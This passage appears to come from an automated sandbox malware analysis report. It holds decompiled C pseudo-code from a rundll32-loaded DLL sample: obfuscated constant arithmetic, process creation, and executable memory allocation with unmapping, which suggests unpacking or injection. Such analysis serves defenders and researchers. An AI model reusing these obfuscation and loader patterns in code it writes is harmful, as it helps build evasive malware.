                                                                        								E100189F6(_v1664, _v1600, __eflags);
                                                                        								_t423 = 1;
                                                                        								__eflags = 1;
                                                                        							} else {
                                                                        								if(_t471 == 0x22ae8e06) {
                                                                        									E10001CB3( &_v1560, _v1624, 0x208, _v1704);
                                                                        									_pop(_t433);
                                                                        									_t471 = 0x1d31c645;
                                                                        									continue;
                                                                        								} else {
                                                                        									_t487 = _t471 - 0x2f70a4dc;
                                                                        									if(_t471 != 0x2f70a4dc) {
                                                                        										L20:
                                                                        										__eflags = _t471 - 0xa4cd945;
                                                                        										if(__eflags != 0) {
                                                                        											continue;
                                                                        										} else {
                                                                        										}
                                                                        									} else {
                                                                        										_push(_t433);
                                                                        										E10001D54(_v1684, _t433, _v1708, _v1652, _v1676,  &_v520, _v1716, _v1632); // executed
                                                                        										E10008C0C(_v1668, _t487, _v1700, _v1604,  &_v1040);
                                                                        										_push(0x100012c0);
                                                                        										_push(_v1640);
                                                                        										E100163BF(E1001BF25(_v1692, _v1644, _t487), _t487, _v1588, _v1720, _t477, _v1692, _v1576,  &_v520,  &_v1040, _v1596);
                                                                        										_t433 = _v1616;
                                                                        										E1001C5F7(_t433, _v1564, _v1660, _v1712, _t418);
                                                                        										_t478 =  &(_t478[0x18]);
                                                                        										_t471 = 0x1e27a3c8;
                                                                        										continue;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					return _t423;
                                                                        				}
                                                                        				_push(0x10001290);
                                                                        				_push(_v1568);
                                                                        				_t406 = E1000D867(E1001BF25(_v1648, _v1696, __eflags), _v1620,  &_v1560, _v1628, _v1688, _v1636); // executed
                                                                        				asm("sbb edi, edi");
                                                                        				_t433 = _v1672;
                                                                        				_t471 = ( ~_t406 & 0x2523cb97) + 0xa4cd945;
                                                                        				__eflags = _t471;
                                                                        				E1001C5F7(_t433, _v1680, _v1572, _v1612, _t404);
                                                                        				_t478 =  &(_t478[9]);
                                                                        				goto L20;
                                                                        			}































































                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #1$%D$2V$9I$=[$@;$\C$bC$cY$s-$x<N$x<N$BS$X
                                                                        • API String ID: 0-3306313712
                                                                        • Opcode ID: 24a479cb9960130481b5e0a16401e8a496e826423d3935e462d2cd1cf3aa2df0
                                                                        • Instruction ID: 6a1dd99ac0dae1f7e91fa6a7f4389cb019a1ae11d87d1325dd7d5c9d98885180
                                                                        • Opcode Fuzzy Hash: 24a479cb9960130481b5e0a16401e8a496e826423d3935e462d2cd1cf3aa2df0
                                                                        • Instruction Fuzzy Hash: 061223715093819FE3A4CF25C94AA4BBBF1FBC1748F50891DE1D9862A0D7B59A49CF03
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 116 100189f6-10018c39 call 100056b2 call 10001cb3 call 1001f2f9 122 10018c3e-10018c43 116->122 123 10018c82 122->123 124 10018c45-10018c47 122->124 127 10018c84-10018c8a 123->127 125 10018c55-10018c80 call 100078f0 * 2 124->125 126 10018c49-10018c4f 124->126 128 10018c50-10018c53 125->128 126->128 128->127
                                                                        C-Code - Quality: 84%
                                                                        			E100189F6(void* __ecx, void* __edx, void* __eflags) {
                                                                        				intOrPtr _t179;
                                                                        				void* _t198;
                                                                        				void* _t199;
                                                                        				signed int _t204;
                                                                        				signed int _t205;
                                                                        				signed int _t206;
                                                                        				signed int _t207;
                                                                        				signed int _t208;
                                                                        				intOrPtr _t230;
                                                                        				signed int _t233;
                                                                        				intOrPtr* _t236;
                                                                        				void* _t237;
                                                                        
                                                                        				_t236 = _t237 - 0x58;
                                                                        				_push( *((intOrPtr*)(_t236 + 0x7c)));
                                                                        				_t230 =  *((intOrPtr*)(_t236 + 0x60));
                                                                        				_push( *((intOrPtr*)(_t236 + 0x78)));
                                                                        				_push( *((intOrPtr*)(_t236 + 0x74)));
                                                                        				_push(0);
                                                                        				_push( *((intOrPtr*)(_t236 + 0x6c)));
                                                                        				_push( *((intOrPtr*)(_t236 + 0x68)));
                                                                        				_push( *((intOrPtr*)(_t236 + 0x64)));
                                                                        				_push(_t230);
                                                                        				_push(__edx);
                                                                        				_t179 = E100056B2(0);
                                                                        				 *((intOrPtr*)(_t236 + 0x10)) = _t179;
                                                                        				 *((intOrPtr*)(_t236 + 0x14)) = _t179;
                                                                        				 *((intOrPtr*)(_t236 + 0xc)) = 0x631fbb;
                                                                        				 *(_t236 + 0x18) = 0xabd8;
                                                                        				 *(_t236 + 0x18) =  *(_t236 + 0x18) >> 0xa;
                                                                        				 *(_t236 + 0x18) =  *(_t236 + 0x18) ^ 0x000028bc;
                                                                        				 *(_t236 + 0x50) = 0x6039;
                                                                        				 *(_t236 + 0x50) =  *(_t236 + 0x50) >> 3;
                                                                        				 *(_t236 + 0x50) =  *(_t236 + 0x50) + 0xffff0189;
                                                                        				 *(_t236 + 0x50) =  *(_t236 + 0x50) | 0x7d810f7b;
                                                                        				 *(_t236 + 0x50) =  *(_t236 + 0x50) ^ 0xffff162f;
                                                                        				 *(_t236 + 0x28) = 0x1c47;
                                                                        				 *(_t236 + 0x28) =  *(_t236 + 0x28) >> 0xc;
                                                                        				 *(_t236 + 0x28) =  *(_t236 + 0x28) ^ 0x0000518a;
                                                                        				 *(_t236 + 0x54) = 0x88f7;
                                                                        				_t204 = 0x7a;
                                                                        				 *(_t236 + 0x54) =  *(_t236 + 0x54) / _t204;
                                                                        				_t205 = 0x2f;
                                                                        				 *(_t236 + 0x54) =  *(_t236 + 0x54) / _t205;
                                                                        				 *(_t236 + 0x54) =  *(_t236 + 0x54) | 0x955efb45;
                                                                        				 *(_t236 + 0x54) =  *(_t236 + 0x54) ^ 0x955eaba7;
                                                                        				 *(_t236 + 0x34) = 0x5d88;
                                                                        				 *(_t236 + 0x34) =  *(_t236 + 0x34) | 0x01d5b93d;
                                                                        				 *(_t236 + 0x34) =  *(_t236 + 0x34) + 0xffff1061;
                                                                        				 *(_t236 + 0x34) =  *(_t236 + 0x34) ^ 0x01d50dda;
                                                                        				 *(_t236 + 0x20) = 0xe64c;
                                                                        				_t206 = 0x3c;
                                                                        				 *(_t236 + 0x20) =  *(_t236 + 0x20) * 0x1a;
                                                                        				 *(_t236 + 0x20) =  *(_t236 + 0x20) ^ 0x00172033;
                                                                        				 *(_t236 + 0x48) = 0x78d;
                                                                        				 *(_t236 + 0x48) =  *(_t236 + 0x48) >> 5;
                                                                        				 *(_t236 + 0x48) =  *(_t236 + 0x48) >> 3;
                                                                        				 *(_t236 + 0x48) =  *(_t236 + 0x48) << 7;
                                                                        				 *(_t236 + 0x48) =  *(_t236 + 0x48) ^ 0x00004d2d;
                                                                        				 *(_t236 + 0x40) = 0xdd42;
                                                                        				 *(_t236 + 0x40) =  *(_t236 + 0x40) | 0x71435ab3;
                                                                        				 *(_t236 + 0x40) =  *(_t236 + 0x40) >> 3;
                                                                        				 *(_t236 + 0x40) =  *(_t236 + 0x40) >> 3;
                                                                        				 *(_t236 + 0x40) =  *(_t236 + 0x40) ^ 0x01c527a4;
                                                                        				 *(_t236 + 0x1c) = 0xfe37;
                                                                        				 *(_t236 + 0x1c) =  *(_t236 + 0x1c) / _t206;
                                                                        				 *(_t236 + 0x1c) =  *(_t236 + 0x1c) ^ 0x00000b23;
                                                                        				 *(_t236 + 0x44) = 0x813f;
                                                                        				 *(_t236 + 0x44) =  *(_t236 + 0x44) + 0x228;
                                                                        				 *(_t236 + 0x44) =  *(_t236 + 0x44) + 0xffff0885;
                                                                        				 *(_t236 + 0x44) =  *(_t236 + 0x44) ^ 0xc0b9d21a;
                                                                        				 *(_t236 + 0x44) =  *(_t236 + 0x44) ^ 0x3f462949;
                                                                        				 *(_t236 + 0x30) = 0xaa8;
                                                                        				 *(_t236 + 0x30) =  *(_t236 + 0x30) + 0xffffc1ea;
                                                                        				 *(_t236 + 0x30) =  *(_t236 + 0x30) + 0xcc5a;
                                                                        				 *(_t236 + 0x30) =  *(_t236 + 0x30) ^ 0x0000b9ca;
                                                                        				 *(_t236 + 0x4c) = 0xb208;
                                                                        				 *(_t236 + 0x4c) =  *(_t236 + 0x4c) * 0x21;
                                                                        				 *(_t236 + 0x4c) =  *(_t236 + 0x4c) ^ 0x1e109f47;
                                                                        				_t233 = 0x44;
                                                                        				_t207 = 0x22;
                                                                        				 *(_t236 + 0x4c) =  *(_t236 + 0x4c) * 0xb;
                                                                        				 *(_t236 + 0x4c) =  *(_t236 + 0x4c) ^ 0x4a46f378;
                                                                        				 *(_t236 + 0x24) = 0x5fb2;
                                                                        				 *(_t236 + 0x24) =  *(_t236 + 0x24) >> 6;
                                                                        				 *(_t236 + 0x24) =  *(_t236 + 0x24) ^ 0x00007116;
                                                                        				 *(_t236 + 0x2c) = 0x59ee;
                                                                        				 *(_t236 + 0x2c) =  *(_t236 + 0x2c) << 0xb;
                                                                        				 *(_t236 + 0x2c) =  *(_t236 + 0x2c) / _t233;
                                                                        				 *(_t236 + 0x2c) =  *(_t236 + 0x2c) ^ 0x000a9b68;
                                                                        				 *(_t236 + 0x38) = 0x60ae;
                                                                        				 *(_t236 + 0x38) =  *(_t236 + 0x38) / _t207;
                                                                        				 *(_t236 + 0x38) =  *(_t236 + 0x38) << 1;
                                                                        				 *(_t236 + 0x38) =  *(_t236 + 0x38) ^ 0x00001475;
                                                                        				 *(_t236 + 0x3c) = 0x510d;
                                                                        				 *(_t236 + 0x3c) =  *(_t236 + 0x3c) << 0xb;
                                                                        				 *(_t236 + 0x3c) =  *(_t236 + 0x3c) | 0x23cc3b8a;
                                                                        				_t208 = 0x4c;
                                                                        				_t149 = _t236 - 0x48; // 0xfffec844
                                                                        				_t209 = _t149;
                                                                        				 *(_t236 + 0x3c) =  *(_t236 + 0x3c) / _t208;
                                                                        				 *(_t236 + 0x3c) =  *(_t236 + 0x3c) ^ 0x0078f0f6;
                                                                        				E10001CB3(_t149,  *(_t236 + 0x18), _t233,  *(_t236 + 0x50));
                                                                        				 *(_t236 - 0x48) = _t233;
                                                                        				_t156 = _t236 - 4; // 0xfffec888
                                                                        				_t158 = _t236 - 0x48; // 0xfffec844
                                                                        				_t198 = E1001F2F9( *(_t236 + 0x28), _t149,  *((intOrPtr*)(_t236 + 0x64)),  *((intOrPtr*)(_t236 + 0x74)),  *((intOrPtr*)(_t236 + 0x78)), _t158,  *(_t236 + 0x54),  *(_t236 + 0x34), _t209,  *(_t236 + 0x20),  *(_t236 + 0x48),  *(_t236 + 0x40), _t209, _t209, _t156); // executed
                                                                        				if(_t198 == 0) {
                                                                        					_t199 = 0;
                                                                        				} else {
                                                                        					if(_t230 == 0) {
                                                                        						E100078F0( *((intOrPtr*)(_t236 - 4)),  *(_t236 + 0x1c),  *(_t236 + 0x44),  *(_t236 + 0x30),  *(_t236 + 0x4c));
                                                                        						E100078F0( *_t236,  *(_t236 + 0x24),  *(_t236 + 0x2c),  *(_t236 + 0x38),  *(_t236 + 0x3c));
                                                                        					} else {
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        					}
                                                                        					_t199 = 1;
                                                                        				}
                                                                        				return _t199;
                                                                        			}
















                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID: I)F?
                                                                        • API String ID: 963392458-3766579322
                                                                        • Opcode ID: 9f0cb1b32e5b959dd6c64c6faedf6d3f6da1e1247f9cda7a21d2f129803ffcb6
                                                                        • Instruction ID: ef7d14b34603df108970e56650a302b1bb14d782bbbedb86e73a05816f7f5754
                                                                        • Opcode Fuzzy Hash: 9f0cb1b32e5b959dd6c64c6faedf6d3f6da1e1247f9cda7a21d2f129803ffcb6
                                                                        • Instruction Fuzzy Hash: 8681E172500248EBEF59CF65C9498CE3BB2FF44348F009219FE15962A0D7BAD999CF80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00260575
                                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 00260625
                                                                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0026063F
                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 00260770
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2113429450.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_240000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction ID: 31790ce3754016f8116699ee82e94ef5c968b23598474c5d52d5f6bca523d49a
                                                                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction Fuzzy Hash: 91B1A8B4E00109DFCB48CF84C590AAEB7B5BF88304F248159E919AB345D735EE92DFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 85 25ff50-25ff9b call 260360 88 25ff9d-25ffa7 call 260360 85->88 89 25ffaa-25ffda call 25fd30 VirtualAlloc 85->89 88->89
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0025FFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2113429450.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_240000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction ID: 7defab86f90389b497b00788d10df0f2df079a5aabeca69ae2a3e1f022344414
                                                                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction Fuzzy Hash: C4114260D082CDDEEF01D7E8C4097EFBFB55F11705F044098DA446B282D2BA57688BB6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 103 1001f2f9-1001f3e8 call 100056b2 call 100104d5 CreateProcessW
                                                                        C-Code - Quality: 30%
                                                                        			E1001F2F9(void* __edx, WCHAR* _a8, WCHAR* _a12, int _a16, struct _STARTUPINFOW* _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, struct _PROCESS_INFORMATION* _a56) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				struct _SECURITY_ATTRIBUTES* _v24;
                                                                        				intOrPtr _v28;
                                                                        				void* _t54;
                                                                        				int _t64;
                                                                        				signed int _t65;
                                                                        
                                                                        				_push(_a56);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(_a44);
                                                                        				_push(_a40);
                                                                        				_push(_a36);
                                                                        				_push(0);
                                                                        				_push(_a28);
                                                                        				_push(_a24);
                                                                        				_push(_a20);
                                                                        				_push(_a16);
                                                                        				_push(_a12);
                                                                        				_push(_a8);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				E100056B2(_t54);
                                                                        				_v28 = 0x170c99;
                                                                        				_v24 = 0;
                                                                        				_v16 = 0x438d;
                                                                        				_v16 = _v16 ^ 0x1c0fc040;
                                                                        				_v16 = _v16 + 0xffffa13b;
                                                                        				_v16 = _v16 ^ 0x1c0f1065;
                                                                        				_v8 = 0x7b12;
                                                                        				_v8 = _v8 + 0xe48b;
                                                                        				_v8 = _v8 << 2;
                                                                        				_t65 = 0x70;
                                                                        				_push(0xf9b1620b);
                                                                        				_v8 = _v8 * 0x77;
                                                                        				_v8 = _v8 ^ 0x028dd8b4;
                                                                        				_v20 = 0x8aa6;
                                                                        				_v20 = _v20 + 0x376a;
                                                                        				_v20 = _v20 ^ 0x0000ade9;
                                                                        				_v12 = 0x19;
                                                                        				_push(0x90aa198d);
                                                                        				_v12 = _v12 / _t65;
                                                                        				_v12 = _v12 << 0xc;
                                                                        				_v12 = _v12 ^ 0x00005708;
                                                                        				E100104D5(0x2ee, _v12 % _t65);
                                                                        				_t64 = CreateProcessW(_a8, _a12, 0, 0, _a16, 0, 0, 0, _a20, _a56); // executed
                                                                        				return _t64;
                                                                        			}













                                                                        APIs
                                                                        • CreateProcessW.KERNEL32(1C0F1065,0000ADE9,00000000,00000000,?,00000000,00000000,00000000,00170C99,?), ref: 1001F3E2
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: b82141c95acb57d60d751e5f2e4688589f7e44b0fc75a65c2ccc181fdfee9b76
                                                                        • Instruction ID: c1c344a82ab6e6d2027d32389277b6a1f50d48e74316109c084eae58ace878c9
                                                                        • Opcode Fuzzy Hash: b82141c95acb57d60d751e5f2e4688589f7e44b0fc75a65c2ccc181fdfee9b76
                                                                        • Instruction Fuzzy Hash: 0731E072901218FBDF11DEA5C90A8DFBFB5FF08354F108188F91866260D3B68A64EF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 108 10001d54-10001e12 call 100056b2 call 100104d5 SHGetFolderPathW
                                                                        APIs
                                                                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 10001E0C
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FolderPath
                                                                        • String ID:
                                                                        • API String ID: 1514166925-0
                                                                        • Opcode ID: 64456d9c3409b7dfc98e3926f3940d727050098de397692e26eff1ef2f8fc9ff
                                                                        • Instruction ID: 5bb8887445c1fcdc0dfe7db06e2ae0198e54bbb703149daf8052fb5d5ae5edad
                                                                        • Opcode Fuzzy Hash: 64456d9c3409b7dfc98e3926f3940d727050098de397692e26eff1ef2f8fc9ff
                                                                        • Instruction Fuzzy Hash: 7D213371D01218ABDF01DFE4CC4A8DEBFB4FB05314F108088F91466260D3799A60DB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 113 1000cd27-1000cdcf call 100104d5 ExitProcess
                                                                        C-Code - Quality: 39%
                                                                        			E1000CD27() {
                                                                        				unsigned int _v8;
                                                                        				signed int _v12;
                                                                        				unsigned int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _t48;
                                                                        
                                                                        				_v20 = 0x9362;
                                                                        				_v20 = _v20 << 3;
                                                                        				_v20 = _v20 + 0x3ac5;
                                                                        				_v20 = _v20 ^ 0x0004a93d;
                                                                        				_v16 = 0x2d14;
                                                                        				_v16 = _v16 | 0xd3f48c41;
                                                                        				_v16 = _v16 >> 5;
                                                                        				_v16 = _v16 ^ 0x069fac5e;
                                                                        				_v12 = 0xc5b1;
                                                                        				_v12 = _v12 << 7;
                                                                        				_v12 = _v12 ^ 0x469c37c1;
                                                                        				_t48 = 0x70;
                                                                        				_push(0xf9b1620b);
                                                                        				_v12 = _v12 / _t48;
                                                                        				_v12 = _v12 ^ 0x00a22cf4;
                                                                        				_v8 = 0x5bb6;
                                                                        				_v8 = _v8 >> 4;
                                                                        				_v8 = _v8 | 0x6c69259f;
                                                                        				_v8 = _v8 >> 0x10;
                                                                        				_v8 = _v8 ^ 0x0000087c;
                                                                        				_push(0xa43506f8);
                                                                        				E100104D5(0x16b, _v12 % _t48);
                                                                        				ExitProcess(0);
                                                                        			}









                                                                        APIs
                                                                        • ExitProcess.KERNEL32(00000000), ref: 1000CDCA
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 095d61fac8955b0d745090151c9d232a6e8b83d7772360794bde9b1750a1fa0c
                                                                        • Instruction ID: fd49a0ddf446a10eaf2e1d98cea76079db48582c58eb1e4a99496c5128524e9f
                                                                        • Opcode Fuzzy Hash: 095d61fac8955b0d745090151c9d232a6e8b83d7772360794bde9b1750a1fa0c
                                                                        • Instruction Fuzzy Hash: 76112775E0060CEBEB48DFE8C84A59EBBB0FB00708F108599D526A7294C3B55B88DF81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 133 1000d867-1000d900 call 100056b2 call 100104d5 lstrcmpiW
                                                                        C-Code - Quality: 27%
                                                                        			E1000D867(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                        				signed int _v8;
                                                                        				unsigned int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				void* _t32;
                                                                        				int _t39;
                                                                        				void* _t41;
                                                                        				WCHAR* _t43;
                                                                        
                                                                        				_push(_a16);
                                                                        				_t43 = __ecx;
                                                                        				_push(_a12);
                                                                        				_push(_a8);
                                                                        				_push(_a4);
                                                                        				_push(__edx);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t32);
                                                                        				_v20 = 0xc112;
                                                                        				_v20 = _v20 << 5;
                                                                        				_v20 = _v20 ^ 0x00187660;
                                                                        				_v16 = 0x44a2;
                                                                        				_v16 = _v16 << 0x10;
                                                                        				_v16 = _v16 ^ 0x44a20c46;
                                                                        				_v8 = 0x80d5;
                                                                        				_v8 = _v8 << 6;
                                                                        				_v8 = _v8 << 9;
                                                                        				_v8 = _v8 ^ 0x406aec0c;
                                                                        				_v12 = 0x3c7d;
                                                                        				_v12 = _v12 >> 0xc;
                                                                        				_v12 = _v12 ^ 0x000035cf;
                                                                        				_push(0xf9b1620b);
                                                                        				_push(0x903a0366);
                                                                        				_t41 = 0x28;
                                                                        				E100104D5(_t41, __edx);
                                                                        				_t39 = lstrcmpiW(_a4, _t43); // executed
                                                                        				return _t39;
                                                                        			}












                                                                        APIs
                                                                        • lstrcmpiW.KERNELBASE(000035CF,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000D8FA
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 1586166983-0
                                                                        • Opcode ID: 8f7063aac4a8c9182ba7432b9d57c55064d4a8a281301381b5e81462a188a855
                                                                        • Instruction ID: 8f5cadfe3fbd449c9d9c17bc6a6d8fcaa3f7433e09eb3b39b642844515f060d6
                                                                        • Opcode Fuzzy Hash: 8f7063aac4a8c9182ba7432b9d57c55064d4a8a281301381b5e81462a188a855
                                                                        • Instruction Fuzzy Hash: 29112376C01208BBEF41EFE4C90A8DEBBB4FB00354F108498E92566251D7B68B64DF81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        C-Code - Quality: 97%
                                                                        			E1000DC2F() {
                                                                        				char _v68;
                                                                        				intOrPtr _v72;
                                                                        				char _v80;
                                                                        				char _v88;
                                                                        				signed int _v92;
                                                                        				signed int _v96;
                                                                        				intOrPtr _v100;
                                                                        				intOrPtr _v104;
                                                                        				intOrPtr _v108;
                                                                        				void* _v112;
                                                                        				intOrPtr _v116;
                                                                        				char _v124;
                                                                        				char _v132;
                                                                        				char _v140;
                                                                        				char _v144;
                                                                        				char _v148;
                                                                        				signed int _v152;
                                                                        				signed int _v156;
                                                                        				signed int _v160;
                                                                        				signed int _v164;
                                                                        				signed int _v168;
                                                                        				signed int _v172;
                                                                        				signed int _v176;
                                                                        				unsigned int _v180;
                                                                        				unsigned int _v184;
                                                                        				signed int _v188;
                                                                        				signed int _v192;
                                                                        				signed int _v196;
                                                                        				signed int _v200;
                                                                        				unsigned int _v204;
                                                                        				signed int _v208;
                                                                        				signed int _v212;
                                                                        				signed int _v216;
                                                                        				signed int _v220;
                                                                        				signed int _v224;
                                                                        				signed int _v228;
                                                                        				signed int _v232;
                                                                        				signed int _v236;
                                                                        				signed int _v240;
                                                                        				signed int _v244;
                                                                        				signed int _v248;
                                                                        				signed int _v252;
                                                                        				signed int _v256;
                                                                        				signed int _v260;
                                                                        				signed int _v264;
                                                                        				signed int _v268;
                                                                        				signed int _v272;
                                                                        				signed int _v276;
                                                                        				signed int _v280;
                                                                        				signed int _v284;
                                                                        				signed int _v288;
                                                                        				signed int _v292;
                                                                        				unsigned int _v296;
                                                                        				signed int _v300;
                                                                        				signed int _v304;
                                                                        				signed int _v308;
                                                                        				signed int _v312;
                                                                        				signed int _v316;
                                                                        				signed int _v320;
                                                                        				signed int _v324;
                                                                        				signed int _v328;
                                                                        				signed int _v332;
                                                                        				signed int _v336;
                                                                        				signed int _v340;
                                                                        				signed int _v344;
                                                                        				signed int _v348;
                                                                        				signed int _v352;
                                                                        				signed int _v356;
                                                                        				signed int _v360;
                                                                        				signed int _v364;
                                                                        				signed int _v368;
                                                                        				unsigned int _v372;
                                                                        				signed int _v376;
                                                                        				signed int _v380;
                                                                        				signed int _v384;
                                                                        				signed int _v388;
                                                                        				signed int _v392;
                                                                        				signed int _v396;
                                                                        				signed int _v400;
                                                                        				signed int _v404;
                                                                        				signed int _v408;
                                                                        				signed int _v412;
                                                                        				signed int _v416;
                                                                        				unsigned int _v420;
                                                                        				signed int _v424;
                                                                        				signed int _v428;
                                                                        				signed int _v432;
                                                                        				signed int _v436;
                                                                        				signed int _v440;
                                                                        				unsigned int _v444;
                                                                        				signed int _v448;
                                                                        				signed int _v452;
                                                                        				signed int _v456;
                                                                        				signed int _v460;
                                                                        				unsigned int _v464;
                                                                        				signed int _v468;
                                                                        				signed int _v472;
                                                                        				signed int _v476;
                                                                        				signed int _v480;
                                                                        				signed int _v484;
                                                                        				signed int _v488;
                                                                        				signed int _v492;
                                                                        				signed int _v496;
                                                                        				signed int _v500;
                                                                        				signed int _v504;
                                                                        				signed int _v508;
                                                                        				signed int _v512;
                                                                        				signed int _v516;
                                                                        				signed int _v520;
                                                                        				signed int _v524;
                                                                        				signed int _v528;
                                                                        				signed int _v532;
                                                                        				signed int _v536;
                                                                        				signed int _v540;
                                                                        				signed int _v544;
                                                                        				signed int _v548;
                                                                        				signed int _v552;
                                                                        				signed int _v556;
                                                                        				signed int _v560;
                                                                        				signed int _v564;
                                                                        				signed int _v568;
                                                                        				signed int _v572;
                                                                        				signed int _v576;
                                                                        				unsigned int _v580;
                                                                        				signed int _v584;
                                                                        				signed int _v588;
                                                                        				signed int _v592;
